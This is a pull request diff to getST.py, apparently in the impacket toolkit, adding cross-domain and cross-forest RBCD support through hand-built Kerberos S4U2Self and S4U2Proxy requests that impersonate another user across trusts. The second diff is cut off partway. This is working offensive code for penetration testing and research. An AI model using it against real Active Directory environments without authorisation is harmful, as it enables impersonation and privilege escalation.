### PR TITLE
Support for cross forest rbcd

### DIFF
--- a/examples/getST.py
+++ b/examples/getST.py
@@ -90,11 +90,14 @@ class GETST:
         self.__aesKey = options.aesKey
         self.__options = options
         self.__kdcHost = options.dc_ip
+        self.__otherdcHost = options.targetdc
+        self.__targetDomain = options.targetdomain
         self.__force_forwardable = options.force_forwardable
         self.__additional_ticket = options.additional_ticket
         self.__dmsa = options.dmsa
         self.__saveFileName = None
         self.__no_s4u2proxy = options.no_s4u2proxy
+        self.__forest = options.forest
         if options.hashes is not None:
             self.__lmhash, self.__nthash = options.hashes.split(':')
 
@@ -172,6 +175,454 @@ class GETST:
         logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
         ccache.saveFile(self.__saveFileName + '.ccache')
 
+
+
+    def doS4U2SelfCrossDomain(self, ticket, decodedTGT, cipher, sessionKey, kdcHost, targetDomain, crossforest):
+        # We have a TGT valid for the cross-domain interaction 
+
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] =  constants.encodeFlags(opts)
+        seq_set(apReq,'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+
+        clientName = Principal()
+        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] =  now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+
+        # Key Usage 7
+        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+        # TGS authenticator subkey), encrypted with the TGS session
+        # key (Section 5.5.1)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+
+        tgsReq['pvno'] =  5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        opts.append( constants.KDCOptions.forwardable.value )
+        opts.append( constants.KDCOptions.renewable.value )
+        opts.append( constants.KDCOptions.renewable_ok.value )
+        opts.append( constants.KDCOptions.canonicalize.value )
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        logging.debug("Principal : " + "%s@%s@%s " % (self.__user, targetDomain, decodedTGT['crealm']))
+        logging.debug("Domain : " + self.__domain)
+        if crossforest:
+            serverName = Principal("%s@%s" % (self.__user, decodedTGT['crealm']), self.__domain, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+        else:
+            serverName = Principal("%s@%s@%s" % (self.__user, self.__domain, targetDomain), self.__targetDomain, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = targetDomain
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
+                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                            int(cipher.enctype)
+                        )
+                    )
+
+        S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_ENTERPRISE.value)
+        if crossforest:
+            S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__domain) + b'Kerberos'
+        else:
+            S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__targetDomain) + b'Kerberos'
+
+        logging.debug(S4UByteArray)
+
+        paencoded = None
+        padatatype = None
+
+        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
+        # with the following three parameters: the session key of the TGT of
+        # the service performing the S4U2Self request, the message type value
+        # of 17, and the byte array S4UByteArray.
+        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
+
+        paForUserEnc = PA_FOR_USER_ENC()
+        crossDomainClient = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
+        seq_set(paForUserEnc, 'userName', crossDomainClient.components_to_asn1)
+        if crossforest:
+            paForUserEnc['userRealm'] = self.__domain
+        else:
+            paForUserEnc['userRealm'] = self.__targetDomain
+        paForUserEnc['cksum'] = noValue
+        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
+        paForUserEnc['cksum']['checksum'] = checkSum
+        paForUserEnc['auth-package'] = 'Kerberos'
+
+        encodedPaForUserEnc = encoder.encode(paForUserEnc)
+        padatatype = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
+        paencoded = encodedPaForUserEnc
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = padatatype
+        tgsReq['padata'][1]['padata-value'] = paencoded
+
+        message = encoder.encode(tgsReq)
+
+        r = sendReceive(message, targetDomain, kdcHost)
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        cipherText = tgs['enc-part']['cipher']
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
+
+        return r, sessionKey, newSessionKey
+    
+
+    def doS4UProxyCrossDomain(self, ticket, decodedTGT, additionalTicket, cipher, sessionKey, kdcHost, targetDomain, crossForest):
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] =  constants.encodeFlags(opts)
+        seq_set(apReq,'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+
+        clientName = Principal()
+        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] =  now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+        tgsReq['pvno'] =  5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # Add resource-based constrained delegation support
+        paPacOptions = PA_PAC_OPTIONS()
+        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
+        if crossForest:
+            paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,constants.PAPacOptions.branch_aware.value))
+
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+        
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        if not(crossForest):
+            seq_set_iter(reqBody, 'additional-tickets', (additionalTicket,))
+
+        opts = list()
+        # This specified we're doing S4U
+        if not(crossForest):
+            opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = str(targetDomain)
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
+                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                            int(cipher.enctype)
+                        )
+                    )
+        message = encoder.encode(tgsReq)
+
+        logging.info('Requesting S4U2Proxy')
+        r = sendReceive(message, targetDomain, kdcHost)
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        cipherText = tgs['enc-part']['cipher']
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
+
+
+        return r, sessionKey, newSessionKey
+    
+    
+    def doRBCDCrossForest(self, ticket, decodedTGT, additionalTicket, cipher, sessionKey, kdcHost, targetDomain):
+        apReq = AP_REQ()
+        new_cipher = crypto._RC4
+
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] =  constants.encodeFlags(opts)
+        seq_set(apReq,'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+
+        clientName = Principal()
+        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] =  now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+        encryptedEncodedAuthenticator = new_cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = new_cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+        tgsReq['pvno'] =  5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # Add resource-based constrained delegation support
+        paPacOptions = PA_PAC_OPTIONS()
+        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+        opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = str(targetDomain)
+
+        seq_set_iter(reqBody, 'additional-tickets', (additionalTicket,))
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
+                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                            int(new_cipher.enctype)
+                        )
+                    )
+        message = encoder.encode(tgsReq)
+
+        logging.info('Requesting TGS')
+        r = sendReceive(message, targetDomain, kdcHost)
+
+        return r
+
+    def doS4UCrossForest(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, otherDcHost, otherDomain):
+        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        # Extract the ticket from the TGT
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        logging.debug("Trying step S4U2SELF for domain:" + self.__domain.upper())
+
+        targetDomain = self.__domain.upper()
+        r, TGT_sessionKey, newSessionKey = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, kdcHost, targetDomain, True)
+
+        logging.debug("S4U2Self - OK")
+
+        domain = self.__domain.upper()
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+        
+        sessionKey = TGT_sessionKey
+        
+        # We use the cross-domain TGT in the authenticator
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+       # But we include our S4U2SELF service ticket as an additional ticket
+        add_ticket = Ticket()
+        add_ticket.from_asn1(tgs['ticket'])
+        myTicket = add_ticket.to_asn1(TicketAsn1())
+
+        r, _, _ = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, cipher, sessionKey, kdcHost, domain, False)
+
+        logging.debug("Second step S4U2Proxy - OK")
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        lastticket = Ticket()
+        lastticket.from_asn1(tgs['ticket'])
+        last = lastticket.to_asn1(TicketAsn1())
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+
+        r, _, newSessionKeyTGS = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, cipher, sessionKey, kdcHost, domain, True)
+        logging.debug("Third step OK : S4U2Proxy crossforest")
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        # Extract the ticket from the TGS
+        ticket = Ticket()
+        ticket.from_asn1(tgs['ticket'])
+        logging.debug("Fourth step TGS crossforest - OK")
+
+        r = self.doRBCDCrossForest(ticket, decodedTGT, last, cipher, newSessionKeyTGS, otherDcHost, otherDomain)
+
+        return r, None, newSessionKeyTGS, None
+    
+
+    def doS4UCrossDomain(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, otherDcHost):
+        init_cipher = cipher
+        init_session_key = sessionKey
+        logging.debug("Asking for cross-domain TGT")
+        target = ("krbtgt/%s@%s" % (self.__targetDomain, self.__domain))
+        serverName = Principal(target, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        cross_domtgt, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, kdcHost, tgt, cipher, sessionKey, self.__options.renew)
+        crossdom_cipher = cipher
+        logging.debug("Cross-domain TGT - OK")
+
+        try: 
+            decodedTGT = decoder.decode(cross_domtgt, asn1Spec=AS_REP())[0]
+        except:
+            decodedTGT = decoder.decode(cross_domtgt, asn1Spec = TGS_REP())[0]
+
+        # Extract the ticket from the cross-domain TGT
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        targetDomain = self.__targetDomain.upper()
+        r, TGT_sessionKey, newSessionKey = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, otherDcHost, targetDomain, False)
+
+        logging.debug("Referral S4U2Self - OK")
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        sessionKey = newSessionKey
+        
+        # Extract the ticket from the response
+        ticket = Ticket()
+        ticket.from_asn1(tgs['ticket'])
+        
+        # We do not need to store the sessionKey, as we will only use the initial TGT and the cross-domain TGT in the authenticator 
+        r, _, _ = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, kdcHost, str(decodedTGT['crealm']).upper(), False)
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        logging.debug("S4U2Self - OK")
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+            
+                                                                        
+        ### Now we have the second ticket : S4U2Self effective ticket
+        # We still have to perform the S4U2Proxy 
+        sessionKey = TGT_sessionKey
+        
+        # We use the initial TGT in the authenticator
+       # But we include our S4U2SELF service ticket  as an additional ticket
+        add_ticket = Ticket()
+        add_ticket.from_asn1(tgs['ticket'])
+        myTicket = add_ticket.to_asn1(TicketAsn1())
+
+        initial_tgt = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        ticket = Ticket()
+        ticket.from_asn1(initial_tgt['ticket'])
+
+        r, _, _ = self.doS4UProxyCrossDomain(ticket, initial_tgt, myTicket, init_cipher, init_session_key, kdcHost, str(decodedTGT['crealm']).upper(), False)
+
+        logging.debug("Referral S4U2Proxy - OK")
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+        add_ticket = Ticket()
+        add_ticket.from_asn1(tgs['ticket'])
+
+        myTicket = add_ticket.to_asn1(TicketAsn1())
+        
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        r, oldsess , newsess = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, crossdom_cipher, sessionKey, otherDcHost, self.__targetDomain, False)
+        logging.debug("S4U2Proxy - OK")
+
+        return r, None, oldsess, None
+    
     def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
         if not os.path.isfile(additional_ticket_path):
             logging.error("Ticket %s doesn't exist" % additional_ticket_path)
@@ -788,8 +1239,11 @@ class GETST:
         if TGT is not None:
             tgt, cipher, sessionKey = TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']
             oldSessionKey = sessionKey
+            logging.debug("session key : " + str(sessionKey.contents))
             
         if tgt is None:
+            # If otherDCHost is not None, and cross-forest is false, we need to obtain a ST for krbtgt on the second domain
+             
             # Still no TGT
             userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
             logging.info('Getting TGT for user')
@@ -798,6 +1252,9 @@ class GETST:
                                                                     self.__aesKey,
                                                                     self.__kdcHost)
             logging.debug("TGT session key: %s" % hexlify(sessionKey.contents).decode())
+
+            
+
 
         # Ok, we have valid TGT, let's try to get a service ticket
         if self.__options.impersonate is None:
@@ -814,23 +1271,34 @@ class GETST:
             self.__saveFileName = self.__user
         else:
             # Here's the rock'n'roll
-            try:
-                logging.info('Impersonating %s' % self.__options.impersonate)
-                # Editing below to pass hashes for decryption
-                if self.__additional_ticket is not None:
-                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
-                                                                                                  self.__kdcHost, self.__additional_ticket)
-                else:
-                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
-            except Exception as e:
-                logging.debug("Exception", exc_info=True)
-                logging.error(str(e))
-                if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
-                    logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
-                if str(e).find('KDC_ERR_BADOPTION') >= 0:
-                    logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
+            
+            # Cross domain/forest interactions
+            if (self.__otherdcHost is not None) and (self.__targetDomain is not None):
+                try:
+                    if self.__forest:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4UCrossForest(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, self.__otherdcHost, self.__targetDomain)
+                    else:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4UCrossDomain(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, self.__otherdcHost)
+                except Exception as e:
+                    print(str(e))
+            else: 
+                try:
+                    logging.info('Impersonating %s' % self.__options.impersonate)
+                    # Editing below to pass hashes for decryption
+                    if self.__additional_ticket is not None:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
+                                                                                                    self.__kdcHost, self.__additional_ticket)
+                    else:
+                        tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
+                except Exception as e:
+                    logging.debug("Exception", exc_info=True)
+                    logging.error(str(e))
+                    if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
+                        logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
+                    if str(e).find('KDC_ERR_BADOPTION') >= 0:
+                        logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
 
-                return
+                    return
             self.__saveFileName = self.__options.impersonate
 
         self.saveTicket(tgs, oldSessionKey)
@@ -872,6 +1340,10 @@ if __name__ == '__main__':
                                                                           '(128 or 256 bits)')
     group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
                                                                             'omitted it use the domain part (FQDN) specified in the target parameter')
+    group.add_argument('-targetdc', action='store', metavar="ip address", help='IP Address of the second domain controller to use. Necessary '
+                                                                            'for cross-domain/forest RBCD')
+    group.add_argument('-targetdomain', action='store', metavar="ip address", help='Second domain to target. Necessary for cross-domain/forest RBCD')
+    parser.add_argument('-forest', dest='forest', action='store_true', help='For cross-forest RBCD')
 
     if len(sys.argv) == 1:
         parser.print_help()

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -79,7 +79,6 @@ from impacket.krb5.types import Principal, KerberosTime, Ticket
 from impacket.ntlm import compute_nthash
 from impacket.winregistry import hexdump
 
-
 class GETST:
     def __init__(self, target, password, domain, options):
         self.__password = password
@@ -90,13 +89,32 @@ class GETST:
         self.__aesKey = options.aesKey
         self.__options = options
         self.__kdcHost = options.dc_ip
-        self.__otherdcHost = options.targetdc
-        self.__targetDomain = options.targetdomain
+        self.__proxydc = options.proxydc
+        self.__proxydomain = options.proxydomain
+        self.__impersonatedc = options.impersonatedc
+        if options.impersonate != None:
+            self.__impersonatedomain = options.impersonate.split('@')[1]
+            self.__impersonateuser = options.impersonate.split('@')[0]
+            # Populate DCs
+            if not options.proxy and self.__domain == self.__impersonatedomain:
+                if self.__kdcHost == None and self.__impersonatedc != None:
+                    self.__kdcHost = self.__impersonatedc
+                if self.__impersonatedc == None and self.__kdcHost != None:
+                    self.__impersonatedc = self.__kdcHost
+            if not options.self and self.__domain == self.__proxydomain:
+                if self.__kdcHost == None and self.__proxydc != None:
+                    self.__kdcHost = self.__proxydc
+                if self.__proxydc == None and self.__kdcHost != None:
+                    self.__proxydc = self.__kdcHost
+        else:
+            self.__impersonatedomain = None
         self.__force_forwardable = options.force_forwardable
         self.__additional_ticket = options.additional_ticket
         self.__dmsa = options.dmsa
         self.__saveFileName = None
-        self.__no_s4u2proxy = options.no_s4u2proxy
+        self.__self = options.self
+        self.__u2u = options.u2u
+        self.__proxy = options.proxy
         self.__forest = options.forest
         if options.hashes is not None:
             self.__lmhash, self.__nthash = options.hashes.split(':')
@@ -175,30 +193,38 @@ class GETST:
         logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
         ccache.saveFile(self.__saveFileName + '.ccache')
 
+    def doS4U2Proxy(self, tgt, cipher, sessionKey, targetSPN, additionalTicket, branchAware, forest, nextDomain, nextKDC, noRec = False):
+        # Extract TGT from AS-REP or TGS-REP for cross-realm request
+        
+        try:
+            decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        except:
+            decodedTGT = decoder.decode(tgt, asn1Spec=TGS_REP())[0]
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
 
-
-    def doS4U2SelfCrossDomain(self, ticket, decodedTGT, cipher, sessionKey, kdcHost, targetDomain, crossforest):
-        # We have a TGT valid for the cross-domain interaction 
+        if additionalTicket != None and not branchAware:
+            logging.info(f"Using additional ticket")
 
         apReq = AP_REQ()
         apReq['pvno'] = 5
         apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
 
         opts = list()
-        apReq['ap-options'] =  constants.encodeFlags(opts)
-        seq_set(apReq,'ticket', ticket.to_asn1)
+        apReq['ap-options'] = constants.encodeFlags(opts)
+        seq_set(apReq, 'ticket', ticket.to_asn1)
 
         authenticator = Authenticator()
         authenticator['authenticator-vno'] = 5
-        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
+        authenticator['crealm'] = str(decodedTGT['crealm'])
 
         clientName = Principal()
-        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
+        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
 
         seq_set(authenticator, 'cname', clientName.components_to_asn1)
 
         now = datetime.datetime.now(datetime.timezone.utc)
-        authenticator['cusec'] =  now.microsecond
+        authenticator['cusec'] = now.microsecond
         authenticator['ctime'] = KerberosTime.to_asn1(now)
 
         encodedAuthenticator = encoder.encode(authenticator)
@@ -217,607 +243,305 @@ class GETST:
 
         tgsReq = TGS_REQ()
 
-        tgsReq['pvno'] =  5
+        tgsReq['pvno'] = 5
         tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
         tgsReq['padata'] = noValue
         tgsReq['padata'][0] = noValue
         tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
         tgsReq['padata'][0]['padata-value'] = encodedApReq
 
-        reqBody = seq_set(tgsReq, 'req-body')
-
-        opts = list()
-        opts.append( constants.KDCOptions.forwardable.value )
-        opts.append( constants.KDCOptions.renewable.value )
-        opts.append( constants.KDCOptions.renewable_ok.value )
-        opts.append( constants.KDCOptions.canonicalize.value )
-
-        reqBody['kdc-options'] = constants.encodeFlags(opts)
-        logging.debug("Principal : " + "%s@%s@%s " % (self.__user, targetDomain, decodedTGT['crealm']))
-        logging.debug("Domain : " + self.__domain)
-        if crossforest:
-            serverName = Principal("%s@%s" % (self.__user, decodedTGT['crealm']), self.__domain, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
-        else:
-            serverName = Principal("%s@%s@%s" % (self.__user, self.__domain, targetDomain), self.__targetDomain, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
-
-        seq_set(reqBody, 'sname', serverName.components_to_asn1)
-        reqBody['realm'] = targetDomain
-
-        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
-
-        reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                        (
-                            int(constants.EncryptionTypes.rc4_hmac.value),
-                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
-                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
-                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
-                            int(cipher.enctype)
-                        )
-                    )
-
-        S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_ENTERPRISE.value)
-        if crossforest:
-            S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__domain) + b'Kerberos'
-        else:
-            S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__targetDomain) + b'Kerberos'
-
-        logging.debug(S4UByteArray)
-
-        paencoded = None
-        padatatype = None
-
-        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
-        # with the following three parameters: the session key of the TGT of
-        # the service performing the S4U2Self request, the message type value
-        # of 17, and the byte array S4UByteArray.
-        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
-
-        paForUserEnc = PA_FOR_USER_ENC()
-        crossDomainClient = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_ENTERPRISE.value)
-        seq_set(paForUserEnc, 'userName', crossDomainClient.components_to_asn1)
-        if crossforest:
-            paForUserEnc['userRealm'] = self.__domain
-        else:
-            paForUserEnc['userRealm'] = self.__targetDomain
-        paForUserEnc['cksum'] = noValue
